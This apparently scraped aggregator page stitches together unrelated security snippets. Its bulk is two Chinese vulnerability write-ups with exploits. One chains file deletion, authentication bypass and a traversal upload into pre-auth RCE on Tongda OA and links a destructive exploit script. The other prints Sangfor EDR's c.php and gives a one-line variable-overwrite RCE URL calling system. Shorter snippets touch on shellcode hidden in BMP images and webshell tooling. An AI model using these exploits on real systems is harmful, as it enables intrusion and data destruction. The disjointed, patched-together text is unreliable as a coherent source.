Aggregator

F5 Labs summer intern describes her experiences building a Python-based HTTPS scanning library for security research and release as an open source tool.

 

0x00关于本文这漏洞我7.4挖出来交给先知，6号审核通过但是迟迟不发奖金，再留言就又是审核中，一直审核到现在（怀疑是因为厂商7.5的新版本就不收影响了，阿里觉得亏了？）护网听说这玩意爆出来了，群里面看知道创宇都有漏洞详情了，感觉吧这个烂在我手上显得没价值，倒不如在EXP流传的到处都是之前，放出来找找乐子exp放在了https://github.com/TomAPU/poc_and_exp/blob/master/rce.py需要者自取（注意，该EXP不是无损EXP，会删除auth.inc.php让OA无法正常工作）
这个漏洞结合了任意文件删除漏洞以及文件上传漏洞，需要两个漏洞配合才可以实现preauth rce复现需要的11.6安装我传到Google上面了：https://drive.google.com/file/d/1L3wG58EQpCufwqoTRP3lFq7IY6PYYqZ-/view?usp=sharing需要者自取
0x01貌似鸡肋的任意文件删除漏洞首先漏洞是在/module/appbuilder/assets/print.php里面一眼看过去，就是把get里面的guid传过去然后删除掉但是任意文件删除漏洞除了搞破坏有什么卵用呢，反正一眼看过去是没什么卵用的
0x02化腐朽为神奇的身份绕过尽管删文件看似只能做破坏，但在某些时候也能绕过一些认证！这是怎么做到的呢？我们来看看通达OA里常用来做身份校验的代码这里呢，简单来讲就是把auth.inc.php给包含进来，如果没有对应session的话，auth.inc.php就会作为“拦路虎”，让用户去登陆，但是删掉会怎么样？这里就要看php里面include和require的区别了这两个东西看起来很相似,都是包含嘛，但是稍稍学过洋文的都知道，include的意思指的是包含，而require却有要求的意思，在这里就可以看出点区别了。如果要包含的文件找不着，include就索性跳过去了，而require是要求，感觉更加强烈一些，找不着文件就撒泼打滚fatal error停止不前了。而恰巧通达OA里面用的都是include，于是如果发现auth.inc.php失踪了，就会直接跳过去!因此我们只需要利用前面的漏洞，删掉auth.inc.php，即可跳过通达OA里面大部分身份验证！
0x03最后一击！变量覆盖&任意文件上传除了身份绕过，我们还要找到一个漏洞点，来getshell
这里我们看到general/data_center/utils/upload.php这前面包含的header.inc.php会将$_REQUEST中的所有东西注册成变量（或者是别的被include进来的文件，因为一个月之前挖掘的，现在记不真切了）这样的话我们就有玩变量覆盖的可能性了！这里呢我们直接跳到漏洞点，就是最下面那个else(为什么直接跳呢？因为其实老版本的代码我删了，这点是我拿漏洞报告里面的代码片段粘的，新版本把这个改的面目全非，而我又忘了代码怎么弄的了，所以直接讲这个漏洞点，想研究的自己搞来分析）
这里则个$s_n是这样的，如果开头不是"{"那么$s_n前面加上一个$repkid，那么就可以通过变量覆盖，传入参数覆盖$repkid，加入../跳到别的目录去（为什么要跳到别的目录呢？因为通达OA的nginx配置中，上传文件所在的attachment目录里面的PHP不准访问，因此必须要跳出去）
那么综合上述就可以给出EXP了（在前面给了）
0x04修复方案删掉这个/module/appbuilder/assets/print.php或者升级到最新版(11.7)（不要自定义WAF规则拦截，通达OA对$_REQUEST里面的东西的全局过滤，导致黑客可以添加<>之类会被过滤掉的内容来绕过去）0x05吐槽昨天说深信服的代码质量不佳，是因为里面有许多奇奇怪怪的用法而这个通达OA的代码质量，只能用惨不忍睹来形容我就说四点1.首先代码里面有的时候会有些调试用的代码片段，莫名其妙打出某个变量，突兀地出现在屏幕上面2.接着呢，这里面有许多没用的PHP文件，散乱地堆在那儿3.还有，代码里面有些地方用了框架，有些地方没有用框架。然后代码各种风格都不统一，强行赛在一块的4.里面有很多不安全的写法，比如说直接echo一个$_GET参数出来，结果又是全局替换过滤了GET参数的，似乎是防护了问题，但是众所周知防护XSS从根本上来说还是要靠编码，这种全局过滤的歪路子，只要哪里没限制好就会出问题

MQTT 全称为 Message Queuing Telemetry Transport（消息队列遥测传输）是是ISO 标准(ISO/IEC PRF 20922)下基于发布/订阅范式的消息协议，由 IBM 发布。由于其轻量、简单、开放和易于实现的特点非常适合需要低功耗和网络带宽有限的IoT场景。比如遥感数据、汽车、智能家居、智慧城市、医疗医护等。

MQTT协议

MQTT协议为大量计算能力有限，低带宽、不可靠网络等环境而设计，其应用非常广泛。目前支持的服务端程序也较丰富，其PHP，JAVA，Python，C，C#等系统语言也都可以向MQTT发送相关消息。 目前最新的版本为5.0版本，可以在https://github.com/mqtt/mqtt.github.io/wiki/servers 这个连接中看到支持MQTT的服务端软件。 其中hivemq中提到针对汽车厂商的合作与应用，在研究过程中会发现有汽车行业应用了MQTT协议。

以下列举我们关心的几项：

1. 使用发布/订阅的消息模式，支持一对多的消息发布；
2. 消息是通过TCP/IP协议传输；
3. 简单的数据包格式；
4. 默认端口为TCP的1883，websocket端口8083，默认消息不加密。8883端口默认是通过TLS加密的MQTT协议。

参与调查并回复您对银针安全沙龙的建议，赢华为开发者大会门票！

将Shellcode隐写到正常BMP图片中，把字符串拆成字节，写入每个像素的alpha通道中，然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载，能有效地增加了免杀性和隐匿性。

 

0x00关于本文这个护网太刺激了，才一天就爆出那么多0day出来。而深信服这个玩意的0day非常重磅，甚至据说因为这个0day太猛，还要暂停演习，免得太不公平但是在机缘巧合之下，笔者拿到了相关漏洞的代码，不禁哑然失笑，没想到这个漏洞居然这么低级，一个大厂开发的东西理应不该如此低级才对，但是事实就是这样，笔者也很惊讶
在这篇文章中，笔者会给出相关的漏洞代码，漏洞分析，EXP，修复措施
0x01 漏洞代码漏洞出现在 tool/log/c.php里面代码如下<?php/** * c.php * 查看ldb的日志 * 支持正则表达式过滤，可以过滤文件以及每行日志 */ call_user_func(function() {    /**     * 编解码     * @param string $data 编解码数据     * @return string 返回编解码数据     */    $code = function($data) {        for ($i = 0; $i < strlen($data); ++$i) {            $data[$i] = $data[$i] ^ 'G';        }        return $data;    };        /**     * 加密请求     * @param string $site  站点     * @param string $query 请求串     * @return string 返回请求URL     */    $request = function($site, $query) use(&$code) {        $path = base64_encode($code($query));        return "$site/$path";    };        /**     * 解密回复     * @param string $data 回复数据     * @return array 返回回复数据     */    $response = function($data) use(&$code) {        $ret = json_decode($data, true);        if (is_null($ret)) {            $dec = $code(base64_decode($data));            $ret = json_decode($dec, true);        }        return $ret;    };        /**     * 找到匹配的日志     * @param string $path 文件路径匹配     * @param string $item 日志项匹配     * @param string $topn TOP N      * @param string $host 主机     * @return array 返回匹配结果     */    $collect = function($path, $item, $topn, $host) use(&$request, &$response) {        $path   = urlencode($path);        $item   = urlencode($item);        $result = file_get_contents($request("http://127.0.0.1:8089", "op=ll&host=$host&path=$path&item=$item&top=$topn"));        return $response($result);    };        /**     * 显示某个表单域     * @param array $info 表单域信息, array("name" => "xx", "value" => "xxx", "note" => "help");     * @return     */    $show_input = function($info) {        extract($info);        $value = htmlentities($value);        echo "<p><font size=2>$title: </font><input type=\"text\" size=30 id=\"$name\" name=\"$name\" value=\"$value\"><font size=2>$note</font></p>";    };        /**     * 去掉反斜杠     * @param string $var 值     * @return string 返回去掉反斜杠的值     */    $strip_slashes = function($var) {        if (!get_magic_quotes_gpc()) {            return $var;        }        return stripslashes($var);    };
    /**     * 显示表单     * @param array $params 请求参数     * @return     */    $show_form = function($params) use(&$strip_slashes, &$show_input) {        extract($params);        $host  = isset($host)  ? $strip_slashes($host)  : "127.0.0.1";        $path  = isset($path)  ? $strip_slashes($path)  : "";        $row   = isset($row)   ? $strip_slashes($row)   : "";        $limit = isset($limit) ? $strip_slashes($limit) : 1000;                // 绘制表单        echo "<pre>";        echo '<form id="studio" name="studio" method="post" action="">';        $show_input(array("title" => "Host ",  "name" => "host",  "value" => $host,  "note" => " - host, e.g. 127.0.0.1"));        $show_input(array("title" => "Path ",  "name" => "path",  "value" => $path,  "note" => " - path regex, e.g. mapreduce"));        $show_input(array("title" => "Row  ",  "name" => "row",   "value" => $row,   "note" => " - row regex, e.g. \s[w|e]\s"));        $show_input(array("title" => "Limit",  "name" => "limit", "value" => $limit, "note" => " - top n, e.g. 100"));        echo '<input type="submit" id="button">';        echo '</form>';        echo "</pre>";    };        /**     * 入口函数     * @param array $argv 配置参数     * @return     */    $main = function($argv)         use(&$collect) {        extract($argv);        if (!isset($limit)) {            return;        }        $result = $collect($path, $row, $limit, $host);        if (!is_array($result)) {            echo $result, "\n";            return;        }        if (!isset($result["success"]) || $result["success"] !== true) {            echo $result, "\n";            return;        }        foreach ($result["data"] as $host => $items) {            $last = "";            foreach ($items as $item) {                if ($item["name"] != $last) {                    $last = $item["name"];                    echo "\n[$host] -> $last\n\n";                }                echo $item["item"], "\n";            }        }    };        set_time_limit(0);    echo '<html><head><meta http-equiv="Content-Type" Content="text/html; Charset=utf-8"></head>';    echo '<body bgcolor="#e8ddcb">';    echo "<p><b>Log Helper</b></p>";    $show_form($_REQUEST);    echo "<pre>";    $main($_REQUEST);    echo "</pre>";  });?>
0x02 漏洞分析首先代码开头的call_user_func里面套一个function就很迷，搞这个在笔者眼里完全是多余的因为其实就相当于执行function()里面的内容而已
接着我们在77-82行看到了他们定义的strip_slashes笔者实在无法理解这些人为什么不直接用 function name($xxx){}的形式定义函数，而一定要弄个时髦的匿名函数，然后复制给一个变量，但是既然这么做了，我们就接着看下去
接着呢在89-94行里面，调用了这个函数看起来就是调用对吧，很完美对吧，没什么问题对吧....只要不被变量覆盖就好可惜的是，偏偏就是有变量覆盖
刚才代码那里，90行直接extrat($params)，那么问题来了，$params从哪儿来的呢？往下翻翻就能找到答案啊这，直接从$_REQUEST里面来，这说明用户提交的参数被直接extract可以覆盖任意变量了..包括$strip_slashes
那么该怎么利用呢？我们知道PHP是支持通过字符串来调用函数的举个例子这个会直接调用phpinfo函数因此按照上面的代码，只需要把strip_slashes覆盖成我们想要执行的函数就可以了，而参数$host也可以覆盖，那么就相当于是可以调用任意函数，传入任意参数了！
0x03 POC/EXPhttps://web/tool/log/c.php?strip_slashes=system&host=id是的只需要这么一行就可以利用防守方请注意，这是extract的$_REQUEST，因此无论是GET/POST/COOKIE的参数都可以用来覆盖，因此把这句话添加到WAF里面过滤是不可行的，攻击者可以轻易绕过！
0x04 修复方法不要妄图设置WAF规则来修复！直接删掉这里的c.php！鉴于他们代码质量不佳，漏洞也一定不止这一处，建议直接下线，不然依然有被打穿的风险

0x05 最后说两句现在HW太疯狂了，以前据说是Nday一起上，万箭齐发就可以了，现在是到处丢0day以前是重金雇佣带黑客，现在是重金购买高危0day这种贴近实战的攻防演习一下来，谁的东西能真正抗攻击抗0day，谁的是看起来很不错但实际上很粗糙，一下就能被看出来了。尽管0day爆出来很刺激，蓝方的朋友们又得加班加点熬夜防护了，但这至少比让0day在黑市上面被转手114514次最后被犯罪分子利用来的好

冰蝎3.0流量层分析，基于PHP示例进行实战分析。

Update 08/24/2020 As mentioned below, the Akamai SIRT has been tracking attacks from the so-called Armada Collective and Fancy Bear actors, who are sending ransom letters to various industry verticals such as finance, travel, and e-commerce. In addition to the...

冰蝎3.0内测版抢先来袭，戳文末获取地址！

推荐一本个人认为最好的风控书-风控要略

这篇文章主要总结学习目前网上关于1.2.68下绕过Autotype的一些方法用到的思路。 前置知识： checkautotype因为是对要进行反序列化的类进行检测的方法 所以我们只需要让其返回Class类型的实例即可 一般会有以下几种情况通过验证： 1.autoTypeCheckHandlers不为

讲个养鱼的小故事。

利用/proc//exe恢复被删除的文件创建

蓝队防守转换思维，化被动为主动，尝试用“攻击”思路代入“防守”中，对“红队”进行反向捕获（反制）。

As cybercriminals continue trying to break into applications using legitimate channels, digital identity is a growing target. Learn what digital identity is and the attack methods fraudsters employ at every stage of the identity life cycle.

Apache Struts2 S2-059(CVE-2019-0230) RCE漏洞通告

一般来说审计的话都可以从入口文件代码开始看起，因为从入口文件代码中可以给到非常多的信息为后面审计做好铺垫，比如根目录下的 `index.php` 基本都会为程序的入口文件。 `index.php...

这几周再准备安全加和知道创宇的议题，所以没更新，明天再讲讲安全建设这事

使用gdbserver远程调试网关中的程序

The year is 2020, and the Coronavirus has affected life around the world in so many ways. For me, a third-year engineering student at R.V. Bangalore , I was looking forward to starting my internship at Akamai when the pandemic took hold, and suddenly everything seemed so uncertain.